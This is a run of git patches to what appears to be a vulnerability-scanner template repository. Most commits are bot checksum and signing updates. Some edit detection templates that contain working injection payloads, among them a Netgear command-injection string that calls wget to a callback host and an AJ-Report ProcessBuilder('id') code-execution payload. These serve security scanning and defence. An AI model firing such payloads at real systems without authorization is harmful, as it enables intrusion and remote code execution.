ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:505c98612682a0603c5b64da1ab9cc8adcca8d55 +templates-checksum.txt:2fdf89d9eb7ee6cdf842d60ab3a17e0e96133532 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c98535fe41cf32923c0abe0f5c48f216e6434608 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:29:51 +0000 Subject: [PATCH 1356/1768] Auto Template Signing [Mon May 27 08:29:51 UTC 2024] :robot: --- http/technologies/sap/sap-netweaver-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index 9ea5d6e1f9..cfce8f3d35 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -43,3 +43,4 @@ http: part: header kval: - "server" +# digest: 490a004630440220739dd9983a583700d0a8c3ec9015f0d6903bb7ba5798c739767cd9273f5814f2022070001e145cad777642ee758312eba04f47ac5bb0ec5621434fdf475c77e53744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cf924bb19fc94be4bb12158fb8d43f310ff42605 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:03:39 +0530 Subject: [PATCH 1357/1768] minor update --- http/cves/2024/CVE-2024-21683.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 690ddc2f10..7ae1b1723f 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -10,12 +10,16 @@ info: - https://confluence.atlassian.com/security/security-bulletin-may-21-2024-1387867145.html - https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated - https://nvd.nist.gov/vuln/detail/CVE-2024-21683 + - https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145 + - https://jira.atlassian.com/browse/CONFSERVER-95832 classification: cvss-metrics: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.3 cve-id: CVE-2024-21683 cwe-id: CWE-78 - tags: cve,cve2024,atlassian,confluence,rce,authenticated + epss-score: 0.00043 + epss-percentile: 0.0866 + tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive variables: username: "{{username}}" From d5e4588c565389c17556511a051e738cfc1542a4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:34:45 +0000 Subject: [PATCH 1358/1768] Auto Generated New Template Addition List [Mon May 27 08:34:45 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d3ddae9e78..fc889fb6f6 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-48084.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 5a207daa3d05eb0ada55b599ccb78b8b6935be32 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:34:56 +0000 Subject: [PATCH 1359/1768] Auto Generated Templates Checksum [Mon May 27 08:34:56 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2ce8921ee7..15981522b0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3355,6 +3355,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:08687154827e9f23b01688eb3729593fa00aaf5d http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee http/default-logins/dvwa/dvwa-default-login.yaml:0803d0330a8ea7cbd071f03e54c1ea65d415ee76 @@ -6935,7 +6936,7 @@ http/technologies/rsshub-detect.yaml:78befe0bfa5036aea006bfb433aa5e8b20f6eb5e http/technologies/s3-detect.yaml:17054560fae17482a2b175a5c0c9baad426c5a6a http/technologies/samsung-smarttv-debug.yaml:25586370a97a672fd2bb066dd4d5fd6c671e4302 http/technologies/sap/sap-igs-detect.yaml:3023bc9a78e2e76f340362a467fd237d2a24ef9e -http/technologies/sap/sap-netweaver-detect.yaml:edb9019351db31f4db98b9df2426ed0f63d38359 +http/technologies/sap/sap-netweaver-detect.yaml:fa681b31c3e1cc867d90aa5571b6d42318cf0da4 http/technologies/sap/sap-netweaver-webgui.yaml:44bdfe780e8dd940ce87f592cb74595e0ea9b052 http/technologies/sap/sap-web-dispatcher-admin-portal.yaml:2b92bc6c5e85d8fd6ec692c484964dd98db2ef0d http/technologies/sap/sap-web-dispatcher.yaml:c54fcf650d5eb35ed5f774056cb21cee58392944 @@ -8563,7 +8564,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2fdf89d9eb7ee6cdf842d60ab3a17e0e96133532 +templates-checksum.txt:e214e3dcbd37b62ccd20063108f02dc07d5b4aaa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bf064914eadbae3ad17fd3db281a7f55cfd982cb Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:35:30 +0000 Subject: [PATCH 1360/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6ea040fb02..534014cb60 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' + - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' workflow_dispatch: From 7b0e556283b0e98ee953777f2edf3330e691d574 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:06:22 +0530 Subject: [PATCH 1361/1768] added metadata --- http/cves/2024/CVE-2024-21683.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 7ae1b1723f..08f731727f 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -19,6 +19,9 @@ info: cwe-id: CWE-78 epss-score: 0.00043 epss-percentile: 0.0866 + metadata: + shodan-query: product:"Confluence" + verified: true tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive variables: From f1416080b043068dd82aabf784fb0ba841e98bae Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:36:41 +0000 Subject: [PATCH 1362/1768] Auto Template Signing [Mon May 27 08:36:41 UTC 2024] :robot: --- .../digital-watchdog/digital-watchdog-default-login.yaml | 1 + http/exposed-panels/microfocus-filr-panel.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml index a872682d03..d5ad80f909 100644 --- a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml @@ -41,3 +41,4 @@ http: - 'contains(body, "token\":")' - 'status_code == 200' condition: and +# digest: 4a0a0047304502200acef2ad5135fd4b7c240538331396ec3066b4d54b992ea622574bcea98ede8d022100ce29a2323d606b29f77387ad8742ee9602a8afda2a474d96f068dfa6b6c019a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/microfocus-filr-panel.yaml b/http/exposed-panels/microfocus-filr-panel.yaml index aa2e673119..84917c5591 100644 --- a/http/exposed-panels/microfocus-filr-panel.yaml +++ b/http/exposed-panels/microfocus-filr-panel.yaml @@ -46,3 +46,4 @@ http: group: 1 regex: - '(?i)\s+([0-9-]+)\s+Micro\s+Focus' +# digest: 4a0a0047304502207c7fce55a5b7a65938e1c7c253a25bc6975da36de0926b166ef9bb79fc6b87d3022100d7218eb2f42de3aae6bb57dea6d3d027d6afc75a816310f9a7e8254bb9e53247:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4673efd298002300b8d32f59d6153ead908ab166 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:06:57 +0530 Subject: [PATCH 1363/1768] fofa update --- http/cves/2024/CVE-2024-21683.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 08f731727f..3be7e486e6 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -20,7 +20,7 @@ info: epss-score: 0.00043 epss-percentile: 0.0866 metadata: - shodan-query: product:"Confluence" + fofa-query: app="ATLASSIAN-Confluence" verified: true tags: cve,cve2024,atlassian,confluence,rce,authenticated,intrusive From 3cd7fa2bc7ab0229fdf8231c5f10ff4f870720aa Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:40:52 +0000 Subject: [PATCH 1364/1768] Auto Generated New Template Addition List [Mon May 27 08:40:52 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index fc889fb6f6..31a501e9f8 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2022/CVE-2022-1580.yaml http/cves/2023/CVE-2023-48084.yaml +http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml From 0a101e8ab99b1b10337f91ba0c46be9bc2389223 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:41:00 +0000 Subject: [PATCH 1365/1768] Auto Generated Templates Checksum [Mon May 27 08:41:00 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 15981522b0..90953aba31 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3261,6 +3261,7 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 +http/cves/2024/CVE-2024-21683.yaml:2bf0436e09be8426c5e84824d11879e00cdc42a0 http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db @@ -3355,7 +3356,7 @@ http/default-logins/dell/dell-dpi-default-login.yaml:c8dabcfcdb39d6a22dd877512d2 http/default-logins/dell/dell-idrac-default-login.yaml:1dc3a2376aeb7ca1b68b49de2fb293c5d3f988d5 http/default-logins/dell/dell-idrac9-default-login.yaml:ff8233327b0de4c8fad6255f51c14ec0771fb8de http/default-logins/dell/emcecom-default-login.yaml:67e9a911b490370e01545f18a1ed6adbb5333fb8 -http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:08687154827e9f23b01688eb3729593fa00aaf5d +http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml:349ed67c3abeedfb09c053fc0c7d7b366e71cc74 http/default-logins/digitalrebar/digitalrebar-default-login.yaml:87a2a0df776e6ceab4b3a02845b43bf93f6d3ada http/default-logins/druid/druid-default-login.yaml:cdf960a64c7f527a149b2a1b5cf62b7d40c4aeee http/default-logins/dvwa/dvwa-default-login.yaml:0803d0330a8ea7cbd071f03e54c1ea65d415ee76 @@ -4062,7 +4063,7 @@ http/exposed-panels/metasploit-setup-page.yaml:b80a5e11ce34feedcc9992dc5e48f4dbf http/exposed-panels/metersphere-login.yaml:2a3e8e8fbd941752330c0c3b4330cd4b0ff2a058 http/exposed-panels/mfiles-web-detect.yaml:68378a6fd15f922fb744e6ee1dc06dbd49fd543b http/exposed-panels/microfocus-admin-server.yaml:0d58160dd2bffa2151ef010cecbace10a6f446c7 -http/exposed-panels/microfocus-filr-panel.yaml:c235633a12af9ea65ce3e61eadae5492bd68b5f7 +http/exposed-panels/microfocus-filr-panel.yaml:27c818153e52e1a77b8579958f1cf752c28746c6 http/exposed-panels/microfocus-lifecycle-panel.yaml:e24f25ddf4c8adcddde94e8284c533410f54b8bb http/exposed-panels/microfocus-vibe-panel.yaml:5405bdcbb28cf44943d03d51c8ce86ec8ba52055 http/exposed-panels/microsoft-exchange-panel.yaml:11adf54da092d2e63804541767f06224a830c4a4 @@ -8564,7 +8565,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e214e3dcbd37b62ccd20063108f02dc07d5b4aaa +templates-checksum.txt:c42877fb34d180fc422d5659e62765d71b4846ab wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 92d70de4af873bbbd6fd397a8e66917541a72144 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:41:31 +0000 Subject: [PATCH 1366/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 534014cb60..061d705328 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' + - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' From ee8cabee0319ea52d3646a015ff3112489758f61 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:42:45 +0000 Subject: [PATCH 1367/1768] Auto Template Signing [Mon May 27 08:42:45 UTC 2024] :robot: --- http/cves/2024/CVE-2024-21683.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 3be7e486e6..aca95fbafd 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -69,3 +69,4 @@ http: - contains(interactsh_protocol, 'dns') - contains(body_3, "confluence") condition: and +# digest: 490a0046304402205e17e1f46f7d3be0e24a6719947291bcd7ee29f12eff3302d5caac3b06b960e00220762f9672204a4cd09ae9f6af85a8b7ec5c363be85a365d69f5416dc5d6582a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d7443fa9153e58121ba4133cdf7dedd5d2e40e23 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 27 May 2024 14:20:53 +0530 Subject: [PATCH 1368/1768] minor update --- http/cves/2023/CVE-2023-2059.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 7d5cf4ebcc..4cb72fc02c 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -1,7 +1,7 @@ id: CVE-2023-2059 info: - name: DedeCMS 5.7.87 - Directory Traversal Vulnerability + name: DedeCMS 5.7.87 - Directory Traversal author: pussycat0x severity: medium description: | @@ -15,14 +15,17 @@ info: cvss-score: 5.3 cve-id: CVE-2023-2059 cwe-id: CWE-28 - epss-score: 0.00107 - epss-percentile: 0.42813 + epss-score: 0.0012 + epss-percentile: 0.46305 cpe: cpe:2.3:a:dedecms:dedecms:5.7.87:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 vendor: dedecms product: dedecms fofa-query: app="DedeCMS" - tags: cve,cve2023,dedecms + shodan-query: http.html:"dedecms" + tags: cve,cve2023,dedecms,lfi http: - raw: @@ -37,7 +40,9 @@ http: words: - "dirname(__FILE__)" - "$cfg_basedir" + - "dedecms" condition: and + case-insensitive: true - type: status status: From 6655a9beccb68cbf31d070c435290f13dbd3842a Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:54:26 +0000 Subject: [PATCH 1369/1768] Auto Generated New Template Addition List [Mon May 27 08:54:26 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 31a501e9f8..6a7b50cdfe 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-1580.yaml +http/cves/2023/CVE-2023-2059.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/default-logins/cambium-networks/cambium-networks-default-login.yaml From 1a817bd4aaa8a74ad9e2acd0e9e7d62871de6d23 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:54:35 +0000 Subject: [PATCH 1370/1768] Auto Generated Templates Checksum [Mon May 27 08:54:35 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 90953aba31..920a31834a 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2916,6 +2916,7 @@ http/cves/2023/CVE-2023-20073.yaml:2f3e6872656d3f4428b063cf071c2b2490a0d0dd http/cves/2023/CVE-2023-2009.yaml:bb71de754a3ece32e5eca69ecd358e30f88f742b http/cves/2023/CVE-2023-20198.yaml:a51d3f58209d7ee5a28087839f7bfe0ba70173c7 http/cves/2023/CVE-2023-2023.yaml:521a587d1d6ebb7014e0800bf4f7a89a66e4bff5 +http/cves/2023/CVE-2023-2059.yaml:98c1b62d9f6b0892241c35c396508d7efe868e28 http/cves/2023/CVE-2023-20864.yaml:39eebb5c215549237a86a0446e07210bc37b47d4 http/cves/2023/CVE-2023-20887.yaml:ed50cf91b29dcdf6a78a4e524805ac4758ea41da http/cves/2023/CVE-2023-20888.yaml:99b2bd7f57dedcd0a4fa003660be6817b734806f @@ -3261,7 +3262,7 @@ http/cves/2024/CVE-2024-1709.yaml:ef74f7909789dfeec2ad788dc3fb37ba5d06e270 http/cves/2024/CVE-2024-20767.yaml:2b596e323ac39c761e0cf7efc3cbc4a772079a0d http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996 http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864 -http/cves/2024/CVE-2024-21683.yaml:2bf0436e09be8426c5e84824d11879e00cdc42a0 +http/cves/2024/CVE-2024-21683.yaml:1e5be00ea45b6b0b78b88c83572f346333c3feaf http/cves/2024/CVE-2024-21887.yaml:a3fd62da315d80a98fc1b4d8101d6b65babf26df http/cves/2024/CVE-2024-21893.yaml:7ac92ba24a2d8b42594efe52a920aca9a9dd760b http/cves/2024/CVE-2024-22024.yaml:9a4da0db5d10fde48c88f49e52f798220ceea7db @@ -8565,7 +8566,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c42877fb34d180fc422d5659e62765d71b4846ab +templates-checksum.txt:9e685fe1f19fa2f9e2b049a93aae38fd8ceae314 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d8a19a4ad45a60488f65bb5f6104c83a2668f7f2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 27 May 2024 08:55:06 +0000 Subject: [PATCH 1371/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 061d705328..0968c201b8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-1580.yaml' + - 'http/cves/2023/CVE-2023-2059.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml' From f6190206477a99e2151f86a27214b75a3b16131e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 27 May 2024 08:56:18 +0000 Subject: [PATCH 1372/1768] Auto Template Signing [Mon May 27 08:56:18 UTC 2024] :robot: --- http/cves/2023/CVE-2023-2059.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-2059.yaml b/http/cves/2023/CVE-2023-2059.yaml index 4cb72fc02c..df356bf630 100644 --- a/http/cves/2023/CVE-2023-2059.yaml +++ b/http/cves/2023/CVE-2023-2059.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022011648b7817f4854aa279b9f331d26ac1f4c03e23eca21457ee72d3397588b7140220513fe0ffaebd0415deced1853ffb70ac950380da12a680d10e4be106aa47913a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0551ac2a392f3c4ff5a72763f4c453937d87bdb3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 27 May 2024 20:55:22 +0530 Subject: [PATCH 1373/1768] lint - fix --- http/iot/netgear-boarddataww-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index c83be5cafd..56d5921e84 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -19,7 +19,7 @@ http: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit matchers-condition: and From f4b8454175f2401a8f806b9a8b9ecbf2b2dc2a71 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 27 May 2024 21:10:27 +0530 Subject: [PATCH 1374/1768] Update aj-report-rce.yaml --- http/vulnerabilities/other/aj-report-rce.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/aj-report-rce.yaml b/http/vulnerabilities/other/aj-report-rce.yaml index aa59ce8e6e..a39694e3c4 100644 --- a/http/vulnerabilities/other/aj-report-rce.yaml +++ b/http/vulnerabilities/other/aj-report-rce.yaml @@ -21,7 +21,7 @@ http: Content-Type: application/json;charset=UTF-8 {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"} - + matchers-condition: and matchers: - type: word @@ -34,7 +34,7 @@ http: - type: regex part: body regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - type: status status: From ef8901dc663dc85d70ed997e995cc7c6ed0f55cf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 27 May 2024 22:06:07 +0530 Subject: [PATCH 1375/1768] Update array-vpn-lfi.yaml --- http/vulnerabilities/other/array-vpn-lfi.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/http/vulnerabilities/other/array-vpn-lfi.yaml b/http/vulnerabilities/other/array-vpn-lfi.yaml index e8a1b14843..50af402872 100644 --- a/http/vulnerabilities/other/array-vpn-lfi.yaml +++ b/http/vulnerabilities/other/array-vpn-lfi.yaml @@ -23,12 +23,15 @@ http: matchers-condition: and matchers: - - type: regex + - type: word part: body + words: + - "/prx/001/http/localh" + + - type: regex regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)" - condition: and + - "root:.*:0:0:" - type: status status: - - 200 + - 401 From be764f75e6d3251c440cfbfea686f2c995b93b6b Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 27 May 2024 19:33:20 +0200 Subject: [PATCH 1376/1768] Update tech-detect.yaml --- http/technologies/tech-detect.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index a4fcb1488b..eefd4e89e1 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -2,7 +2,7 @@ id: tech-detect info: name: Wappalyzer Technology Detection - author: hakluke + author: hakluke,righettod severity: info metadata: max-request: 1 @@ -2234,6 +2234,14 @@ http: - href="(?:\/|[^>]+)webapp\/wcs\/ condition: or part: body + + - type: word + name: ibm-websphere-application-server + words: + - 'SRVE0255E:' + - 'A WebGroup/Virtual Host to handle' + condition: or + part: body - type: regex name: bootstrap @@ -3718,4 +3726,3 @@ http: part: server words: - "istio-envoy" -# digest: 4a0a00473045022100dda47d007d349ebedb421dbacca584c8a22ec4f7eef5c4500bb051ec65bc11fc02206c9f127f5f0ba79e1ad88514f2e37693741a04f6b9b492a58a6143d05d83c780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 61cdcefcf9beaf0b736fd254dbaf5ae84c489ec1 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 27 May 2024 19:39:05 +0200 Subject: [PATCH 1377/1768] Fix linter error --- http/technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index eefd4e89e1..5348890da9 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -2234,7 +2234,7 @@ http: - href="(?:\/|[^>]+)webapp\/wcs\/ condition: or part: body - + - type: word name: ibm-websphere-application-server words: From e5c5006ec6dd02a7028c976d7f85a505ead1f685 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Mon, 27 May 2024 20:20:26 +0200 Subject: [PATCH 1378/1768] Update default-oracle-application-page.yaml --- .../oracle/default-oracle-application-page.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/http/technologies/oracle/default-oracle-application-page.yaml b/http/technologies/oracle/default-oracle-application-page.yaml index 721b90f2c6..3613c92279 100644 --- a/http/technologies/oracle/default-oracle-application-page.yaml +++ b/http/technologies/oracle/default-oracle-application-page.yaml 